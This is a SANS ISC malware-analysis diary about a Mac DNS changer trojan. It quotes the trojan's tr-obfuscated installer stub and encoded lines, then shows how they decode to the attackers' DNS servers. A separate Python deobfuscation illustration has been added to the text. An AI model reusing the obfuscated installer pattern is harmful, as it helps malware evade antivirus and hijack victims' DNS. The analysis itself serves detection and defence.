SANS ISC: (Minor) evolution in Mac DNS changer malware

Back in November last year we published a diary about Mac DNS changer malware. The main idea was to make Mac users aware that the bad guys are not ignoring this platform any more.

While the malware itself was not anything spectacular (i.e. it did not exploit any vulnerabilities, but was based on social engineering), the way it was packed showed that the attackers meant real business.

All the malware did was change the local DNS servers to a couple of servers in a known bad network, and tell the command and control server that a new victim is ready.

The anti-virus coverage was especially disappointing. Only a couple of anti-virus programs detected the original sample (a DMG file). This improved a bit over time, so when I tested the sample again today on VirusTotal, 10 anti-virus programs detected it.

One of our readers, Matt, submitted a new sample today. I quickly analyzed it, and the sample does exactly the same thing as the one from September – it changes the DNS servers and reports to a C&C server.

However, one thing I noticed was that the attackers started obfuscating the installation code. The obfuscation is very, very simple (they only use the tr command) but, unfortunately, it was enough to fool almost *all* anti-virus programs – according to VirusTotal, this new sample was detected by only 2 (!!) AV programs. Signature detection failure I would say …

The deobfuscation is really simple: the new sample looks like this:

x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos
sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;

daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF

In other words, they take the file, count its lines, subtract 2 from the line count, tail that many lines (everything after the two-line stub), pass them through the first tr command and redirect the output to a file named 1, which the stub then runs with sh.

The second and third tr commands are used to deobfuscate the s1 and s2 variables, which contain the IP addresses of the DNS servers. These can easily be deobfuscated manually:

$ s1=cx.zxx.aax.zq;s2=cx.zxx.aaz.asw; echo $s1|tr qazwsxedcr 0123456789
$ echo $s2| tr qazwsxedcr 0123456789
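As an added illustration (not code from the diary or from the sample), the following Python mirrors the stub's tail-and-tr logic and recovers the letter substitution of the first tr command from the two obfuscated lines quoted above, using assumed plaintexts as cribs; the crib strings, the variable and function names, and the constructed test file are my assumptions, and the DNS addresses are whatever the sample's own digit tr sets produce.

```python
import string

# Constructed inputs: the two obfuscated lines quoted in the diary.
OBFUSCATED_LINES = [
    'daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"',
    "PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF",
]
# Assumed plaintexts (cribs): what an analyst expects those lines to say once decoded.
CRIBS = [
    'path="/Library/Internet Plug-Ins"',
    "PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF",
]
DIGIT_SET1, DIGIT_SET2 = "qazwsxedcr", "0123456789"  # the s1/s2 tr sets from the sample

def tr(text, set1, set2):
    """Plain character substitution, like `tr SET1 SET2` without ranges or classes."""
    return text.translate(str.maketrans(set1, set2))

def extract_payload(script):
    """Replicate the stub: x = (line count) - 2, then `tail -$x` keeps the last x lines."""
    lines = script.splitlines()
    return "\n".join(lines[2:])  # wc -l minus 2 == everything after the two stub lines

def recover_mapping(cipher_lines, plain_lines):
    """Align each obfuscated line with its crib and collect the lowercase substitution.
    A crib that contradicts an earlier one raises, which is how a wrong guess shows up."""
    mapping = {}
    for c_line, p_line in zip(cipher_lines, plain_lines):
        if len(c_line) != len(p_line):
            raise ValueError("crib length mismatch: %r" % p_line)
        for c, p in zip(c_line, p_line):
            if c in string.ascii_lowercase and mapping.setdefault(c, p) != p:
                raise ValueError("inconsistent crib: %r -> %r and %r" % (c, mapping[c], p))
    return mapping

def deobfuscate(line, mapping):
    """Apply the recovered substitution; letters not yet recovered are shown as '?'."""
    return "".join(mapping.get(ch, "?") if ch in string.ascii_lowercase else ch for ch in line)

def decode_dns_servers(s1, s2):
    """The second and third tr calls: digits were hidden behind the letters qazwsxedcr."""
    return tr(s1, DIGIT_SET1, DIGIT_SET2), tr(s2, DIGIT_SET1, DIGIT_SET2)

if __name__ == "__main__":
    m = recover_mapping(OBFUSCATED_LINES, CRIBS)
    print("recovered %d of the 25 letters in the first tr set" % len(m))
    print(deobfuscate(OBFUSCATED_LINES[1], m))
    print(decode_dns_servers("cx.zxx.aax.zq", "cx.zxx.aaz.asw"))
```

Two lines of cribs recover 18 of the 25 letters; any further obfuscated line from the sample that uses an unrecovered letter shows up as a '?' rather than a silently wrong character.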

As you can see, it's the same network as before, so make sure that you are monitoring any DNS requests going there, since they indicate that you have infected machines on your network. And for the AV vendors – they will obviously have to step up on the Mac front.

ISC Handler
Apr 30th 2008